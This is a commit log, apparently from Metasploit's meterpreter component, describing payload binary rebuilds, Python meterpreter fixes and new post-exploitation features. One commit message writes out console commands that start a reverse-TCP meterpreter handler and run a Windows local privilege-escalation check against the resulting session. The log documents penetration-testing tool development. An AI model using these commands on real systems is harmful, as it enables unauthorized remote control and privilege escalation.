0988c5e691
use the correct implementation for query_value_direct
2015-03-03 22:29:23 -06:00
cf0589f8c6
add support for direct reg access to pymeterpreter
...
When testing this, I found that the python meterpreter hangs running the
following, with or without these changes.
```
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set PythonMeterpreterDebug true
set lhost 192.168.43.1
exploit -j
sleep 5
use exploit/windows/local/trusted_service_path
set SESSION 1
check
```
This turned out to be that pymeterpreter ate all the rest of the data in the
recv socket by consuming 4k unconditionally. This would only be exposed if
there were multiple simultaneous requests so the recv buffer filled beyond a
single request, e.g. when using the registry enumeration functions.
2015-02-17 06:11:20 -06:00
7ab7add721
bump meterpreter_bins to 0.0.14, update Linux binaries.
...
Hopefully the last manual build before packaging the Linux bins into
meterpreter_bins as well.
This includes all of the fixes and improvements over the past month.
rapid7/meterpreter#116
rapid7/meterpreter#117
rapid7/meterpreter#121
rapid7/meterpreter#124
2015-02-10 12:43:47 -06:00
2fdeeb3b13
Rebuilt Java Payloads with the latest NDK/SDK and meterpreter-javapayload
...
Fix rapid7/meterpreter#95 , rebuilt with all outstanding PRs from
rapid7/metasploit-javapayload.
2015-02-02 13:09:15 -06:00
94fda6e617
Land #4600 , jvazquez-r7's Linux meterpreter bins
2015-01-20 09:38:35 -06:00
f12c6a1624
Update meterpreter.py
...
Read until exactly pkt_length bytes
2015-01-18 15:45:28 +02:00
d83c6ae215
Update meterpreter.py
...
Read exactly pkt_length from socket, prevents over-reading.
2015-01-18 15:29:23 +02:00
ffc676ead0
Update linux meterp binaries
2015-01-16 17:09:38 -06:00
dfdf99c8f4
Remove metcli
...
The metcli.exe binary doesn't get used any more and the source was removed
from Meterpreter ages ago. No point in having it in the repo any more.
2015-01-10 09:21:44 +10:00
ce87b126c1
Update to the latest meterpreter_bins
...
This removes checked-in sniffer extension in favor of the gem-packaged version.
It also pulls in the changes for verifying #4411
2015-01-09 16:57:10 -06:00
32ddd5ccb4
delete unused library from meterpreter dir
...
common.lib is only used by the build process, not MSF
2015-01-07 16:00:37 -06:00
7ae56865f1
Update linux meterpreter binaries for rapid7/meterpreter#111
...
This rebuilds the binaries on Ubuntu 10.04 i386 for metepreter PR #111 ,
improving the reliability and fixing some bugs in linux process migration.
Tested against Ubuntu 10.04 i386 and Ubuntu 14.04 x86_64:
```
meterpreter > ps
...
55994 48270 server 0 bcook ../metasploit-framework/server
56009 44199 bash 0 bcook -bash
56094 56009 dummy 0 bcook ./dummy
meterpreter > migrate 56094
[*] Migrating to 56094
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : mint
OS : Linux mint 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > ps
...
55994 48270 [server] <defunct> 0 bcook
56009 44199 bash 0 bcook -bash
56094 56009 dummy 0 bcook ./dummy
meterpreter >
```
Verified presence of call stub when debugging a session:
```
(gdb) x/32b 0x61cc28
0x61cc28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x61cc30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x61cc38: 0x90 0x90 0x68 0x04 0x00 0x00 0x00 0x68
0x61cc40: 0xff 0xff 0xff 0xff 0xb8 0x5a 0x5a 0x5a
```
2015-01-04 10:47:44 -06:00
69bda63ef6
Update linux meterpreter binaries
2015-01-01 20:05:36 -06:00
dccf189600
Update binaries
2014-12-30 18:39:29 -06:00
d3050de862
Remove references to Redmine in code
...
See #4400 . This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
2014-12-19 17:27:08 -06:00
0ee20561d4
Remove file exists check from stdapi_fs_delete_file
2014-12-09 11:03:57 -06:00
42710cc32e
Error messages for the python meterpreter
2014-12-09 11:03:57 -06:00
83b0ac0209
Fix stdapi_sys_config_getenv for Python3
2014-12-04 15:58:17 -06:00
44816b84aa
Prefer the pwd module for getuid when available
2014-12-04 15:58:17 -06:00
2b36c1bb43
Fix pymeterp bugs from testing in osx and python3
2014-11-17 14:04:30 -05:00
0bf93acf6b
Pymeterp http proxy and user agent support
2014-11-16 14:29:20 -05:00
e562883ba9
Escape inserted vars and fix core_loadlib
2014-11-15 15:06:18 -05:00
7c14e818f6
Patch pymeterp http settings
2014-11-14 17:12:23 -05:00
681ae8ce6b
Pymet reverse_http stager basic implementation
2014-11-14 14:15:46 -05:00
6b2387b7fc
Prepare for a reverse_http stager
2014-11-14 11:15:22 -05:00
7edc248207
Don't fail if username_from_token returns None
2014-11-10 09:15:16 -05:00
104841babf
Add getsid to the python meterpreter
2014-11-08 20:57:24 -05:00
766a69e310
Add sys_process_kill to the python meterpreter
2014-10-07 10:10:22 -04:00
7da22d064d
Remove an unnecessary var and fix process_close
2014-10-02 20:52:45 -04:00
af3ca19ab2
Land #3501 , @AnwarMohamed's android meterpreter commands.
2014-08-09 16:29:59 -05:00
77be5d3e0a
Land #3520 : Update Linux Meterpreter Binaries
...
Includes fixes for the sniffer which stop it breaking on x64 and make
it work with the `any` interface.
[FixRM #6355 ]
2014-07-15 09:27:30 +10:00
de22aeba41
Land #3481 , meterpreter bins
2014-07-14 15:57:52 -05:00
31c447e217
Update binaries
2014-07-14 08:50:30 -05:00
074632043f
Update meterpreter binaries
2014-07-10 16:36:48 -05:00
038d1e210a
Merge upstream/master to deconflict.
...
Conflicts:
Gemfile.lock
2014-07-09 17:43:42 -05:00
34dcb609e2
android extension
2014-07-08 04:52:06 +02:00
bdf27b1834
Fix up the TLVs that are now QWORD values in MSF
...
Various values were adjusted to become QWORD values in MSF an windows
meterpreter, but the changes were not ported over to python, php and
java. This commit fixes this inconsistency.
2014-07-07 10:42:58 -05:00
9246f7a0ce
Strip the NULL that PHP no longer strips
...
As of PHP 5.5.0, unpack("a", ...) no longer strips the NULL byte from
the end of the string. A new format specifier, Z, was introduced to
perform the old behavior, but we don't have a good way to test for its
existence. Instead, just remove it with str_replace
2014-07-03 15:58:05 -05:00
8b63d3d467
Revert the revert of #3446
...
This reverts commit 9b35b0e13a
2014-06-29 17:22:21 -05:00
9b35b0e13a
Revert "Land #3446 -- Meterpreter bins gem switch" due to build failures
...
This reverts commit bba8bd3498002234993f
2014-06-25 13:24:07 -05:00
fbb6808b1a
Re-add common.lib and ext_server_sniffer DLLs
...
These are not currently included in meterpreter_bins. Figure this out
with @cdoughty-r7 , probably just an oversight.
2014-06-19 16:10:22 -05:00
88b482118d
Remove local Meterpreter Windows binaries
2014-06-19 16:05:53 -05:00
af9028e867
Add Meterpreter bins for PR76
...
These are the binaries generated for rapid7/meterpreter#76 , against
commit 2776adb8b91d9967983033c0e770c46a10a68002
These bins are need to make #3416 actually functional
2014-06-12 14:29:40 -05:00
d9a5002bd3
Merge branch 'release'
...
Updates meterpreter bins and closes #3425 and #3423 .
2014-06-05 17:33:11 -05:00
97a70e49c8
Roll back the jar/py changes
2014-06-05 17:31:02 -05:00
737f06f600
Add Meterpreter bins for release branch.
...
This contains the same bins as #3423 , but it is targeted at the release
branch for rapid7/metasploit-framework.
2014-06-05 17:17:32 -05:00
6c7fd3642a
Land #3411 , Python 3.[34] Meterpreter support
2014-06-03 11:34:22 -05:00
d0d389598a
Land #3086 , Android Java Meterpreter updates
...
w00t.
2014-06-02 17:28:38 -05:00
b84297980d
Pymeterpreter use print_exc and not print_exception
2014-06-02 16:50:54 -04:00
d2b8706bd6
Include meterpreter bins, add Sandbox builds
...
This commit contains the binaries that are needed for Juan's sandbox
escape functionality (ie. the updated old libloader code). It also
contains rebuilt binaries for all meterpreter plugins.
I've also added command line build scripts for the sandbox escapes
and added that to the "exploits" build.
2014-05-31 08:12:34 +10:00
77eac38b01
Pymeterpreter fix processes_via_proc for Python v3
2014-05-30 16:32:03 -04:00
4f5ab2c596
Pymeterpreter support process channels for Python v3
2014-05-30 14:35:47 -04:00
e2cc2fece0
Pymeterpreter update win reg functions for python v3
2014-05-30 10:51:36 -04:00
04e94b0c07
Fix meterpreter and file tests for Python v3.4 on Win
2014-05-29 16:42:28 -04:00
15dc33591b
In pymeterpreter use a MeterpreterFile obj for Py v3
2014-05-29 15:09:09 -04:00
d8dcfd8f41
Update pymeterpreter netlink to support python3
2014-05-29 13:48:15 -04:00
145776db4d
Add a DEBUGGING option to the python meterpreter
2014-05-29 10:52:49 -04:00
15b1c79039
Adjust whitespace and set bytes to str for Python 2
2014-05-28 16:30:27 -04:00
4bd2dabfcd
Land #3121 , new kiwi extension, with compiled bins
...
See also rapid7/meterpreter#79
2014-04-29 17:53:37 -05:00
05436dc2c5
Refresh binaries for Meterpreter
...
This includes:
rapid7/meterpreter#69
rapid7/meterpreter#70
rapid7/meterpreter#75
rapid7/meterpreter#77
rapid7/meterpreter#78
As of commit: 45bcbd13a1e0215647f6a61631652b686931bba8
2014-03-19 08:57:04 -05:00
5ea26688d7
Fix a syntax error for Python 2.4
2014-03-11 15:22:52 -04:00
f3493ce220
Merge branch 'master' into pymeterpreter-net
...
Conflicts:
data/meterpreter/ext_server_stdapi.py
2014-03-11 15:15:02 -04:00
b87c2dca0b
Use older hash modules when hashlib isn't there
2014-03-11 12:25:54 -05:00
75c94cc5d7
Derp
2014-03-10 16:30:55 -05:00
e508079aff
Don't crash when ctypes isn't available
2014-03-10 16:10:24 -05:00
6616d36d63
New meterpreter bins for testing.
2014-03-07 13:21:30 -08:00
1dea1c030e
Add interface support via OSX SystemConfiguration
2014-03-05 13:59:13 -05:00
0834102e2b
Support tcp server channels and add a python MeterpreterSocket
2014-03-04 13:31:29 -05:00
7111e8aa59
Support retrieving interface information via GetAdaptersAddresses
2014-03-03 21:01:16 -05:00
699e534149
Add missing return statement.
2014-03-02 00:18:46 -05:00
1c9390c9cf
Support retrieving interface information via windows mib functions.
2014-03-02 00:17:00 -05:00
733a86ec74
Support retrieving interface information via netlink.
2014-03-01 22:34:38 -05:00
284d99aa6c
Add pymeterp TLV types for additional network functions.
2014-02-28 13:56:51 -05:00
99e272e463
Return true in EOF when tell() > stat.st_size
2014-02-27 20:45:38 -05:00
096e06baa6
Added binaries from Meterpreter PR #74
...
Meterpreter PR https://github.com/rapid7/meterpreter/pull/74 was landed,
this adds the binaries from that PR.
2014-02-06 11:47:29 +10:00
80c4a6e9eb
Updated binaries for Meterpreter
...
This includes changes up to commit hash e77c87cdb79a2732108be937e056622b45cb093c
2014-01-17 09:02:48 +10:00
96e97d4768
Oops, the default bufsize is 0 anyways.
2014-01-05 18:57:56 -06:00
b64df51fa0
Fixes #8732 by reading until EOF reached.
...
* use a lambda for cleaner iterator.
* also disables buffering, since we are reading byte-by-byte in the first place
and maintaining our own buffer (#data).
2014-01-05 18:36:22 -06:00
45a0ac9e68
Land #2602 , Windows Extended API
...
Retrieve clipboard data
Retrieve window handles
Retrieve service information
2013-12-08 19:01:35 +00:00
c8e2c8d085
Add binaries from Meterpreter 9e33acf3a283f1df62f264e557e1f6161d8c2999
...
This is a new set of binaries for Meterpreter as of commit hash
9e33acf3a283f1df62f264e557e1f6161d8c2999. We haven't yet finalised
the process we'll be using for releasing bins from Meterpreter to MSF
so this is hopefully the last time we will have to do it the old way.
2013-12-04 16:23:03 +10:00
bcab716ec0
Add the binaries from the meterpreter repo
...
Given this is a new extension, building bins and including them in this
PR can't cause any issues regarding lost functionality (like it can
with existing bins).
Adding to this PR so that it's easier to test and land.
2013-11-29 09:02:07 +10:00
72813c1f3e
Merge branch 'egypt/feature/getenv-php' into getenv_cmd
2013-11-27 15:22:15 +10:00
a3337e5de5
Add PHP side for meterpreter getenv
2013-11-26 23:16:28 -06:00
a0f703ee44
Add getenv support to python meterpreter
...
This change adds support for `getenv` to python meterpreter. Nothing too
complex going on here. I tidied up the definitions of the TLVs as well
so that they look nice.
2013-11-27 11:19:26 +10:00
0b413aa0b8
Remove extapi binaries
...
These were committed in the flurry of merges last night by me. They
should be removed until the extapi PR has been fully reviewed and
merged. This commit just removes the binaries from master, they'll
be re-added when appropriate.
2013-11-15 06:24:00 +10:00
4bd0900359
Updated meterpreter binaries
...
Includes the following:
* Clean builds
* Removal of kitrap0d from getsystem
* Doc updates
* Webcam crash fix
* Schedular and channel refactor
* Posix crash fix for post modules
2013-11-15 01:14:14 +10:00
715fdc05ec
Updated meterpreter binaries
...
Includes the following changes:
* Security cleanup - remove use of insecure functions
* Windows 8/8.1/2012 R2 support to sysinfo
* VS 2013 upgrade
* Command dispatcher refactor
* Getproxy command added (needs MSF side too)
2013-11-07 14:31:54 +10:00
27739a0351
Meterpreter bins after Meterpreter PR 32
...
Protects against potential BOFs due to strcpy usage.
These binaries were built against meterpreter master after
https://github.com/rapid7/meterpreter/pull/32 landed.
The CI tests can be seen here:
https://ci.metasploit.com/view/Meterpreter/job/MeterpreterWin/75/
Note, this commit is signed. Your merge commit should be signed, too, so
people can be assured that nobody is backdooring Meterpreter on the sly.
2013-10-24 15:15:49 -05:00
827bf23979
Updated binaries with railgun crash fixes
2013-10-18 19:43:17 +10:00
6f23e95c14
Fix an endianess issue in pymeterpreter registry_query_value.
2013-10-12 23:39:22 +01:00
378f403fab
Land #2453 , Add stdapi_net_resolve_host(s) to Python Meterpreter.
...
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
b477ae369b
Updated stdapi binaries with railgun fix
...
Changes are from https://github.com/rapid7/meterpreter/pull/28
2013-10-10 16:03:38 +10:00
0a194b203d
Updated sniffer binaries
...
These updated binaries include a packet-sniffer fix which results in
sniffing working on x86 builds of Windows 8 and Windows 8.1.
2013-10-09 07:38:54 +10:00
7414dff958
Add fault tolerance for resolve_hosts.
2013-10-04 08:51:13 -04:00
ecf286a8c4
Add support for stdapi_net_resolve_host.
2013-10-03 10:31:54 -04:00
56b6f0be02
Add bins for #2443
...
See #740 and meterpreter#26
2013-10-01 23:47:24 -05:00
c38f3b4a56
New meterpreter binaries
...
New binaries contain fixes for:
* kitrap0d crashing during `getsystem` calls.
* https://github.com/rapid7/meterpreter/pull/23
* Meterpreter crashing on XP SP0 in certain scenarios.
* https://github.com/rapid7/meterpreter/pull/21
2013-09-27 09:31:53 +10:00
3cdddb8ff3
New meterpreter binaries for ip resolv feature
...
* New meterpreter binaries that include the IP resolve feature.
* Updated .gitignore to correctly match pivot file name.
2013-09-21 07:12:40 +10:00
dc9246a770
New compiled bins for shiny vs2012 build
...
* Fixes x64 sniffer [FixRM #8364 ]
2013-09-17 18:11:13 -05:00
21055f6856
Add x86 to meterpreter's binary suffix
...
This makes x86 more consistent with x64.
Also replaces a bunch of instances of:
File.join(Msf::Config.install_root, 'data', ...)
with the simpler
File.join(Msf::Config.data_directory, ...)
[See rapid7/meterpreter#19 ]
2013-09-16 21:52:04 -05:00
Brent Cook
eyalgr
jvazquez-r7
OJ
Tod Beardsley
Spencer McIntyre
joev
James Lee
AnwarMohamed
Chris Doughty
Brandon Turner
William Vu
Meatballs